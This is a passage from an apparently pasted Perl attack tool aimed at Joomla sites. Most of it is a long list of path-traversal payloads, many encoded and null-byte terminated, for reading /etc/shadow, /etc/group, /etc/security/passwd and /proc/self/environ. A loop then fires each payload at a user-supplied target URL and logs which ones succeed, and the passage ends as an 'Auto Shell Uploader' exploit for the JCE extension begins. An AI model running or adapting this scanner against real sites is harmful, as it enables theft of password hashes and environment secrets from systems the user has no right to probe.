..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron","..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron","%2Fproc%2Fself%2Fenviron%00","..%2Fproc%2Fself%2Fenviron%00","..%2F..%2Fproc%2Fself%2Fenviron%00","..%2F..%2F..%2Fproc%2Fself%2Fenviron%00","..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron%00","..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron%00","..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron%00","..%2F..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron%00","..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron%00","..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron%00","..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron%00","//proc/self/environ","....//proc/self/environ","....//....//proc/self/environ","....//....//....//proc/self/environ","....//....//....//....//proc/self/environ","....//....//....//....//....//proc/self/environ","....//....//....//....//....//....//proc/self/environ","....//....//....//....//....//....//....//proc/self/environ","....//....//....//....//....//....//....//....//proc/self/environ","....//....//....//....//....//....//....//....//....//proc/self/environ","....//....//....//....//....//....//....//....//....//....//proc/self/environ","//proc/self/environ%00","....//proc/self/environ%00","....//....//proc/self/environ%00","....//....//....//proc/self/environ%00","....//....//....//....//proc/self/environ%00","....//....//....//....//....//proc/self/environ%00","....//....//....//....//....//....//proc/self/environ%00","....//....//....//....//....//....//....//proc/self/environ%00","....//....//....//....//....//....//....//....//proc/self/environ%00","....//....//....//....//....//....//....//....//....//proc/self/environ%00","....//....//....//....//....//....//....//....//....//....//proc/self/environ%00","%2f%2Fproc/self/environ","....%2f%2Fproc/self/environ","....%2f%2F....%2f%2Fproc/self/environ","....%2f%2F....%2f%2F....%2f%2Fproc/self/environ","....%2f%2F....%2f%2F....%2f%2F....%2f%2Fproc/self/environ","....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2Fproc/self/environ","....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2Fproc/self/environ","....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2Fproc/self/environ","....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2Fproc/self/environ","....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2Fproc/self/environ","....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2Fproc/self/environ","%2f%2Fproc/self/environ%00","....%2f%2Fproc/self/environ%00","....%2f%2F....%2f%2Fproc/self/environ%00","....%2f%2F....%2f%2F....%2f%2Fproc/self/environ%00","....%2f%2F....%2f%2F....%2f%2F....%2f%2Fproc/self/environ%00","....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2Fproc/self/environ%00","....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2Fproc/self/environ%00","....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2Fproc/self/environ%00","....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2Fproc/self/environ%00","....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2Fproc/self/environ%00","....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2Fproc/self/environ%00","/etc/shadow","../etc/shadow","../../etc/shadow","../../../etc/shadow","../../../../etc/shadow","../../../../../etc/shadow","../../../../../../etc/shadow","../../../../../../../etc/shadow","../../../../../../../../etc/shadow","../../../../../../../../../etc/shadow","../../../../../../../../../../etc/shadow","/etc/shadow%00","../etc/shadow%00","../../etc/shadow%00","../../../etc/shadow%00","../../../../etc/shadow%00","../../../../../etc/shadow%00","../../../../../../etc/shadow%00","../../../../../../../etc/shadow%00","../../../../../../../../etc/shadow%00","../../../../../../../../../etc/shadow%00","../../../../../../../../../../etc/shadow%00","%2Fetc..%2Fshadow","..%2Fetc%2Fshadow","..%2F..%2Fetc%2Fshadow","..%2F..%2F..%2Fetc%2Fshadow","..%2F..%2F..%2F..%2Fetc%2Fshadow","..%2F..%2F..%2F..%2F..%2Fetc%2Fshadow","..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fshadow","..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fshadow","..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fshadow","..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fshadow","..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fshadow","%2Fetc..%2Fshadow%00","..%2Fetc%2Fshadow%00","..%2F..%2Fetc%2Fshadow%00","..%2F..%2F..%2Fetc%2Fshadow%00","..%2F..%2F..%2F..%2Fetc%2Fshadow%00","..%2F..%2F..%2F..%2F..%2Fetc%2Fshadow%00","..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fshadow%00","..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fshadow%00","..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fshadow%00","..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fshadow%00","..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fshadow%00","%2F%2Fetc/shadow","....%2f%2Fetc/shadow","....%2f%2F....%2f%2Fetc/shadow","....%2f%2F....%2f%2F....%2f%2Fetc/shadow","....%2f%2F....%2f%2F....%2f%2F....%2f%2Fetc/shadow","....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2Fetc/shadow","....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2Fetc/shadow","....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2Fetc/shadow","....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2Fetc/shadow","....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2Fetc/shadow","....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2Fetc/shadow","%2F%2Fetc/shadow%00","....%2f%2Fetc/shadow%00","....%2f%2F....%2f%2Fetc/shadow%00","....%2f%2F....%2f%2F....%2f%2Fetc/shadow%00","....%2f%2F....%2f%2F....%2f%2F....%2f%2Fetc/shadow%00","....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2Fetc/shadow%00","....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2Fetc/shadow%00","....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2Fetc/shadow%00","....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2Fetc/shadow%00","....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2Fetc/shadow%00","....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2Fetc/shadow%00","....//etc/shadow","....//....//etc/shadow","....//....//....//etc/shadow","....//....//....//....//etc/shadow","....//....//....//....//....//etc/shadow","....//....//....//....//....//....//etc/shadow","....//....//....//....//....//....//....//etc/shadow","....//....//....//....//....//....//....//....//etc/shadow","....//....//....//....//....//....//....//....//....//etc/shadow","....//....//....//....//....//....//....//....//....//....//etc/shadow","....//etc/shadow%00","....//....//etc/shadow%00","....//....//....//etc/shadow%00","....//....//....//....//etc/shadow%00","....//....//....//....//....//etc/shadow%00","....//....//....//....//....//....//etc/shadow%00","....//....//....//....//....//....//....//etc/shadow%00","....//....//....//....//....//....//....//....//etc/shadow%00","....//....//....//....//....//....//....//....//....//etc/shadow%00","....//....//....//....//....//....//....//....//....//....//etc/shadow%00","/etc/group","../etc/group","../../etc/group","../../../etc/group","../../../../etc/group","../../../../../etc/group","../../../../../../etc/group","../../../../../../../etc/group","../../../../../../../../etc/group","../../../../../../../../../etc/group","../../../../../../../../../../etc/group","/etc/group%00","../etc/group%00","../../etc/group%00","../../../etc/group%00","../../../../etc/group%00","../../../../../etc/group%00","../../../../../../etc/group%00","../../../../../../../etc/group%00","../../../../../../../../etc/group%00","../../../../../../../../../etc/group%00","../../../../../../../../../../etc/group%00","%2Fetc..%2Fgroup","..%2Fetc%2Fgroup","..%2F..%2Fetc%2Fgroup","..%2F..%2F..%2Fetc%2Fgroup","..%2F..%2F..%2F..%2Fetc%2Fgroup","..%2F..%2F..%2F..%2F..%2Fetc%2Fgroup","..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fgroup","..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fgroup","..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fgroup","..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fgroup","..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fgroup","%2Fetc%2Fgroup%00","..%2Fetc%2Fgroup%00","..%2F..%2Fetc%2Fgroup%00","..%2F..%2F..%2Fetc%2Fgroup%00","..%2F..%2F..%2F..%2Fetc%2Fgroup%00","..%2F..%2F..%2F..%2F..%2Fetc%2Fgroup%00","..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fgroup%00","..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fgroup%00","..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fgroup%00","..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fgroup%00","..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fgroup%00","%2F%2Fetc/group","....%2F%2Fetc/group","....%2F%2F....%2F%2Fetc/group","....%2F%2F....%2F%2F....%2F%2Fetc/group","....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/group","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/group","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/group","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/group","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/group","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/group","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/group","/etc/group%00","....%2F%2Fetc/group%00","....%2F%2F....%2F%2Fetc/group%00","....%2F%2F....%2F%2F....%2F%2Fetc/group%00","....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/group%00","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/group%00","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/group%00","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/group%00","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/group%00","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/group%00","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/group%00","//etc/group","....//etc/group","....//....//etc/group","....//....//....//etc/group","....//....//....//....//etc/group","....//....//....//....//....//etc/group","....//....//....//....//....//....//etc/group","....//....//....//....//....//....//....//etc/group","....//....//....//....//....//....//....//....//etc/group","....//....//....//....//....//....//....//....//....//etc/group","....//....//....//....//....//....//....//....//....//....//etc/group","//etc/group%00","....//etc/group%00","....//....//etc/group%00","....//....//....//etc/group%00","....//....//....//....//etc/group%00","....//....//....//....//....//etc/group%00","....//....//....//....//....//....//etc/group%00","....//....//....//....//....//....//....//etc/group%00","....//....//....//....//....//....//....//....//etc/group%00","....//....//....//....//....//....//....//....//....//etc/group%00","....//....//....//....//....//....//....//....//....//....//etc/group%00","/etc/security/passwd","../etc/security/passwd","../../etc/security/passwd","../../../etc/security/passwd","../../../../etc/security/passwd","../../../../../etc/security/passwd","../../../../../../etc/security/passwd","../../../../../../../etc/security/passwd","../../../../../../../../etc/security/passwd","../../../../../../../../../etc/security/passwd","../../../../../../../../../../etc/security/passwd","/etc/security/passwd%00","../etc/security/passwd%00","../../etc/security/passwd%00","../../../etc/security/passwd%00","../../../../etc/security/passwd%00","../../../../../etc/security/passwd%00","../../../../../../etc/security/passwd%00","../../../../../../../etc/security/passwd%00","../../../../../../../../etc/security/passwd%00","../../../../../../../../../etc/security/passwd%00","../../../../../../../../../../etc/security/passwd%00","%2Fetc%2Fsecurity%2Fpasswd","..%2Fetc%2Fsecurity%2Fpasswd","..%2F..%2Fetc%2Fsecurity%2Fpasswd","..%2F..%2F..%2Fetc%2Fsecurity%2Fpasswd","..%2F..%2F..%2F..%2Fetc%2Fsecurity%2Fpasswd","..%2F..%2F..%2F..%2F..%2Fetc%2Fsecurity%2Fpasswd","..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fsecurity%2Fpasswd","..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fsecurity%2Fpasswd","..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fsecurity%2Fpasswd","..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fsecurity%2Fpasswd","..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fsecurity%2Fpasswd","%2Fetc%2Fsecurity%2Fpasswd%00","..%2Fetc%2Fsecurity%2Fpasswd%00","..%2F..%2Fetc%2Fsecurity%2Fpasswd%00","..%2F..%2F..%2Fetc%2Fsecurity%2Fpasswd%00","..%2F..%2F..%2F..%2Fetc%2Fsecurity%2Fpasswd%00","..%2F..%2F..%2F..%2F..%2Fetc%2Fsecurity%2Fpasswd%00","..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fsecurity%2Fpasswd%00","..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fsecurity%2Fpasswd%00","..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fsecurity%2Fpasswd%00","..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fsecurity%2Fpasswd%00","..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fsecurity%2Fpasswd%00","....%2F%2Fetc/security/passwd","....%2F%2F....%2F%2Fetc/security/passwd","....%2F%2F....%2F%2F....%2F%2Fetc/security/passwd","....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/security/passwd","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/security/passwd","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/security/passwd","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/security/passwd","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/security/passwd","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/security/passwd","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/security/passwd","....%2F%2Fetc/security/passwd%00","....%2F%2F....%2F%2Fetc/security/passwd%00","....%2F%2F....%2F%2F....%2F%2Fetc/security/passwd%00","....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/security/passwd%00","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/security/passwd%00","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/security/passwd%00","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/security/passwd%00","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/security/passwd%00","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/security/passwd%00","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/security/passwd%00","....//etc/security/passwd","....//....//etc/security/passwd","....//....//....//etc/security/passwd","....//....//....//....//etc/security/passwd","....//....//....//....//....//etc/security/passwd","....//....//....//....//....//....//etc/security/passwd","....//....//....//....//....//....//....//etc/security/passwd","....//....//....//....//....//....//....//....//etc/security/passwd","....//....//....//....//....//....//....//....//....//etc/security/passwd","....//....//....//....//....//....//....//....//....//....//etc/security/passwd","....//etc/security/passwd%00","....//....//etc/security/passwd%00","....//....//....//etc/security/passwd%00","....//....//....//....//etc/security/passwd%00","....//....//....//....//....//etc/security/passwd%00","....//....//....//....//....//....//etc/security/passwd%00","....//....//....//....//....//....//....//etc/security/passwd%00","....//....//....//....//....//....//....//....//etc/security/passwd%00","....//....//....//....//....//....//....//....//....//etc/security/passwd%00","....//....//....//....//....//....//....//....//....//....//etc/security/passwd%00","/etc/security/passwd","../etc/security/passwd","../../etc/security/passwd","../../../etc/security/passwd","../../../../etc/security/passwd","../../../../../etc/security/passwd","../../../../../../etc/security/passwd","../../../../../../../etc/security/passwd","../../../../../../../../etc/security/passwd","../../../../../../../../../etc/security/passwd","../../../../../../../../../../etc/security/passwd","/etc/security/passwd%00","../etc/security/passwd%00","../../etc/security/passwd%00","../../../etc/security/passwd%00","../../../../etc/security/passwd%00","../../../../../etc/security/passwd%00","../../../../../../etc/security/passwd%00","../../../../../../../etc/security/passwd%00","../../../../../../../../etc/security/passwd%00","../../../../../../../../../etc/security/passwd%00","../../../../../../../../../../etc/security/passwd%00","%2Fetc%2Fsecurity%2Fpasswd","..%2Fetc%2Fsecurity%2Fpasswd","..%2F..%2Fetc%2Fsecurity%2Fpasswd","..%2F..%2F..%2Fetc%2Fsecurity%2Fpasswd","..%2F..%2F..%2F..%2Fetc%2Fsecurity%2Fpasswd","..%2F..%2F..%2F..%2F..%2Fetc%2Fsecurity%2Fpasswd","..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fsecurity%2Fpasswd","..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fsecurity%2Fpasswd","..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fsecurity%2Fpasswd","..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fsecurity%2Fpasswd","..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fsecurity%2Fpasswd","%2Fetc%2Fsecurity%2Fpasswd%00","..%2Fetc%2Fsecurity%2Fpasswd%00","..%2F..%2Fetc%2Fsecurity%2Fpasswd%00","..%2F..%2F..%2Fetc%2Fsecurity%2Fpasswd%00","..%2F..%2F..%2F..%2Fetc%2Fsecurity%2Fpasswd%00","..%2F..%2F..%2F..%2F..%2Fetc%2Fsecurity%2Fpasswd%00","..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fsecurity%2Fpasswd%00","..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fsecurity%2Fpasswd%00","..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fsecurity%2Fpasswd%00","..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fsecurity%2Fpasswd%00","..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fsecurity%2Fpasswd%00","....%2F%2Fetc/security/passwd","....%2F%2F....%2F%2Fetc/security/passwd","....%2F%2F....%2F%2F....%2F%2Fetc/security/passwd","....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/security/passwd","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/security/passwd","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/security/passwd","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/security/passwd","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/security/passwd","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/security/passwd","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/security/passwd","....%2F%2Fetc/security/passwd%00","....%2F%2F....%2F%2Fetc/security/passwd%00","....%2F%2F....%2F%2F....%2F%2Fetc/security/passwd%00","....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/security/passwd%00","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/security/passwd%00","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/security/passwd%00","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/security/passwd%00","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/security/passwd%00","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/security/passwd%00","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/security/passwd%00","....//etc/security/passwd","....//....//etc/security/passwd","....//....//....//etc/security/passwd","....//....//....//....//etc/security/passwd","....//....//....//....//....//etc/security/passwd","....//....//....//....//....//....//etc/security/passwd","....//....//....//....//....//....//....//etc/security/passwd","....//....//....//....//....//....//....//....//etc/security/passwd","....//....//....//....//....//....//....//....//....//etc/security/passwd","....//....//....//....//....//....//....//....//....//....//etc/security/passwd","....//etc/security/passwd%00","....//....//etc/security/passwd%00","....//....//....//etc/security/passwd%00","....//....//....//....//etc/security/passwd%00","....//....//....//....//....//etc/security/passwd%00","....//....//....//....//....//....//etc/security/passwd%00","....//....//....//....//....//....//....//etc/security/passwd%00","....//....//....//....//....//....//....//....//etc/security/passwd%00","....//....//....//....//....//....//....//....//....//etc/security/passwd%00","....//....//....//....//....//....//....//....//....//....//etc/security/passwd%00","/etc/security/group","../etc/security/group","../../etc/security/group","../../../etc/security/group","../../../../etc/security/group","../../../../../etc/security/group","../../../../../../etc/security/group","../../../../../../../etc/security/group","../../../../../../../../etc/security/group","../../../../../../../../../etc/security/group","../../../../../../../../../../etc/security/group","/etc/security/group%00","../etc/security/group%00","../../etc/security/group%00","../../../etc/security/group%00","../../../../etc/security/group%00","../../../../../etc/security/group%00","../../../../../../etc/security/group%00","../../../../../../../etc/security/group%00","../../../../../../../../etc/security/group%00","../../../../../../../../../etc/security/group%00","../../../../../../../../../../etc/security/group%00","%2Fetc%2Fsecurity%2Fgroup","..%2Fetc%2Fsecurity%2Fgroup","..%2F..%2Fetc%2Fsecurity%2Fgroup","..%2F..%2F..%2Fetc%2Fsecurity%2Fgroup","..%2F..%2F..%2F..%2Fetc%2Fsecurity%2Fgroup","..%2F..%2F..%2F..%2F..%2Fetc%2Fsecurity%2Fgroup","..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fsecurity%2Fgroup","..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fsecurity%2Fgroup","..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fsecurity%2Fgroup","..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fsecurity%2Fgroup","..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fsecurity%2Fgroup","%2Fetc%2Fsecurity%2Fgroup%00","..%2Fetc%2Fsecurity%2Fgroup%00","..%2F..%2Fetc%2Fsecurity%2Fgroup%00","..%2F..%2F..%2Fetc%2Fsecurity%2Fgroup%00","..%2F..%2F..%2F..%2Fetc%2Fsecurity%2Fgroup%00","..%2F..%2F..%2F..%2F..%2Fetc%2Fsecurity%2Fgroup%00","..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fsecurity%2Fgroup%00","..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fsecurity%2Fgroup%00","..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fsecurity%2Fgroup%00","..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fsecurity%2Fgroup%00","..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fsecurity%2Fgroup%00","%2F%2Fetc/security/group","....%2F%2Fetc/security/group","....%2F%2F....%2F%2Fetc/security/group","....%2F%2F....%2F%2F....%2F%2Fetc/security/group","....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/security/group","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/security/group","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/security/group","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/security/group","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/security/group","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/security/group","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/security/group","%2F%2Fetc/security/group%00","....%2F%2Fetc/security/group%00","....%2F%2F....%2F%2Fetc/security/group%00","....%2F%2F....%2F%2F....%2F%2Fetc/security/group%00","....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/security/group%00","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/security/group%00","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/security/group%00","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/security/group%00","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/security/group%00","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/security/group%00","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/security/group%00","//etc/security/group","....//etc/security/group","....//....//etc/security/group","....//....//....//etc/security/group","....//....//....//....//etc/security/group","....//....//....//....//....//etc/security/group","....//....//....//....//....//....//etc/security/group","....//....//....//....//....//....//....//etc/security/group","....//....//....//....//....//....//....//....//etc/security/group","....//....//....//....//....//....//....//....//....//etc/security/group","....//....//....//....//....//....//....//....//....//....//etc/security/group","//etc/security/group%00","....//etc/security/group%00","....//....//etc/security/group%00","....//....//....//etc/security/group%00","....//....//....//....//etc/security/group%00","....//....//....//....//....//etc/security/group%00","....//....//....//....//....//....//etc/security/group%00","....//....//....//....//....//....//....//etc/security/group%00","....//....//....//....//....//....//....//....//etc/security/group%00","....//....//....//....//....//....//....//....//....//etc/security/group%00","....//....//....//....//....//....//....//....//....//....//etc/security/group%00");
  1397.  
  1398. print "\n\ Enter Target eg:http://www.site.com/index.php?option=com_jeauto&view=";
  1399. print "\n\ Target:";
  1400. $Target=<STDIN>;
  1401. chomp ($kkk);
  1402.  
  1403.  
  1404. foreach $LFI(@LFI){
  1405. my $URL = $kkk.$LFI;
  1406. my $Source = get $URL;
  1407. die "Can not get $URL" unless defined $URL;
  1408. if ($Source =~ m/root/i || m/usr/i || m/dev/i || m/:x:/i || m/var/i || m/bin/i) { $Message ="LFI Vulnerability FOUND";}
  1409. else { $Message = "NOT FOUND LFI Vulnerability";}
  1410. print "$URL     =>    $Message\n";
  1411. print "\n \n \n \n \t \t \t \t FINISH ";
  1412. open (TEXT, '>>LFI.txt');
  1413. print TEXT "\n$URL   =>   $Message \n\n";
  1414. close (TEXT);
  1415. print 'result in LFI.txt';
  1416. }
  1417. }
  1418.  
  1419. if($c eq '5')
  1420. {
  1421. system("title Joomla JCE vuln");
  1422. system("cls");
  1423. print color("green"), "\n\n\t.::. Exploit for JCE Joomla Extension (Auto Shell Uploader) V0.1 .::.\n\n";
  1424. print color("green"), "\t||||        edited by: CrashBandicot (ccrashbandicot[@]gmail[dot]com)      ||||\n\n";
